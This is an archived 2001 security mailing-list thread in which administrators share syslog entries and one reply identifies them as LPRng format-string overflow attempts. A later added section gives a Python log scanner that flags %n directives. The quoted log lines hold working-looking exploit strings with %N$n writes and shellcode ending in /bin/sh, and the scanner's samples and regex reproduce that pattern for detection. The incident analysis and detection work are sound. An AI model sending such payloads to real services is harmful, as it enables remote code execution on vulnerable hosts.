Hi Tim.

I am going to take a guess, but this looks like the LPRng overflow, specifically the shellcode used. I could be wrong because this shellcode is used in other attacks as well.

Tim Brown wrote:
>
> I tried to post this to the list earlier this week, but it never got here.
>
> A sysadmin found about 35 of these entries over a few seconds in her log this
> morning (4/9/2001). Any ideas?
>
> Apr 5 21:30:27 sun1 bsd-gw[28481]: Invalid protocol request
> (66):
>
> BBBXXXXXXXXXXXXXXXXXX%.156u%300$n%.21u%301$nsecurity%302$n%.192u%303$n111F1f1C]C]KMM1ECf]fE'MEEEMCCC1?A^u1FEMU/bin/sh
>
> "Leite, Zailo" wrote:
>
> > We've been getting this on messages since yesterday. Is this a worm trying
> > to propagate?
> >
> > Z
> >
> > Apr 9 10:26:32 bing.bong.edu bsd-gw[25383]: Invalid protocol request (66):
> > BBBXYZ[XXXXXXXXXXXXXXXXXX%.24u%300$n%.165u%301$n%.253u%302$n%.192u%303$n111F
> > 1f1C]C]KMM1ECf]fE'MEEEMCCC1?A^u1FEMU/bin/sh
> > Apr 9 10:26:33 bing.bong.edu bsd-gw[25387]: Invalid protocol request (66):
> > BBBHIJKXXXXXXXXXXXXXXXXXXsecurity%300$n%.181u%301$n%.253u%302$n%.192u%303$n1
> > 11F1f1C]C]KMM1ECf]fE'MEEEMCCC1?A^u1FEMU/bin/sh
> > Apr 9 10:26:33 bing.bong.edu bsd-gw[25388]: Invalid protocol request (66):
> > BBBDEFGXXXXXXXXXXXXXXXXXXsecu%300$n%.185u%301$n%.253u%302$n%.192u%303$n111F1
> > f1C]C]KMM1ECf]fE'MEEEMCCC1?A^u1FEMU/bin/sh
>
> --
>
> Tim Brown
> Network Security Analyst

--
The events which transpired five thousand years ago; Five years ago or five minutes ago, have determined what will happen five minutes from now; five years
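
Added example, not part of the original posts: the entries quoted in this thread carry printf-style `%N$n` directives (which store a count through a pointer) preceded by `%.NNNu` padding, so a log scan can flag them and report per-host bursts like the "35 entries over a few seconds" described above. The host names, payload prefixes, function names, year and thresholds below are assumptions made for the illustration.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample lines shaped like the quoted entries (hosts invented, binary tail omitted).
SAMPLE_LOG = """\
Apr  9 10:26:32 host-a.example bsd-gw[25383]: Invalid protocol request (66): BBBXXXX%.24u%300$n%.165u%301$n%.253u%302$n%.192u%303$n/bin/sh
Apr  9 10:26:33 host-a.example bsd-gw[25387]: Invalid protocol request (66): BBBXXXXsecurity%300$n%.181u%301$n%.253u%302$n%.192u%303$n/bin/sh
Apr  9 10:26:33 host-a.example bsd-gw[25388]: Invalid protocol request (66): BBBXXXXsecu%300$n%.185u%301$n%.253u%302$n%.192u%303$n/bin/sh
Apr  9 11:02:10 host-b.example bsd-gw[311]: Invalid protocol request (66): Bjob-queue 100% full
Apr  9 11:05:00 host-a.example sshd[400]: Accepted publickey for ops
"""
SYSLOG = re.compile(r"^(\w{3})\s+(\d{1,2})\s+(\d\d:\d\d:\d\d)\s+(\S+)\s+([^\s\[]+)\[(\d+)\]:\s+(.*)$")
WRITE = re.compile(r"%(?:\d+\$)?(?:hh|h|ll|l)?n")  # %n, %hn, %300$n
PAD = re.compile(r"%\d*\.\d+[diuxX]")              # %.156u style padding before a write

def scan(text, year=2001):
    """Return one finding per syslog line whose message holds a %n-style directive."""
    findings = []
    for line in text.splitlines():
        m = SYSLOG.match(line)
        writes = WRITE.findall(m.group(7)) if m else []
        if not writes:
            continue
        mon, day, clock, host, prog, pid, msg = m.groups()
        findings.append({
            "time": datetime.strptime(f"{year} {mon} {day} {clock}", "%Y %b %d %H:%M:%S"),
            "host": host, "prog": prog, "pid": int(pid),
            "writes": len(writes), "pads": len(PAD.findall(msg)), "shell": "/bin/sh" in msg,
        })
    return findings

def bursts(findings, window_s=10, min_hits=3):
    """Map host -> largest number of findings inside any window_s-second window."""
    by_host = defaultdict(list)
    for f in findings:
        by_host[f["host"]].append(f["time"])
    out = {}
    for host, times in by_host.items():
        times.sort()
        best = max(sum(1 for t in times[i:] if (t - times[i]).total_seconds() <= window_s)
                   for i in range(len(times)))
        if best >= min_hits:
            out[host] = best
    return out

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["time"], hit["host"], hit["prog"], hit["pid"], hit["writes"], hit["pads"])
    print(bursts(scan(SAMPLE_LOG)))
```

Syslog timestamps carry no year, so `scan` takes it as a parameter; the benign `100% full` line is not flagged because no `n` conversion follows the percent sign.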
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 09:27:53 PDT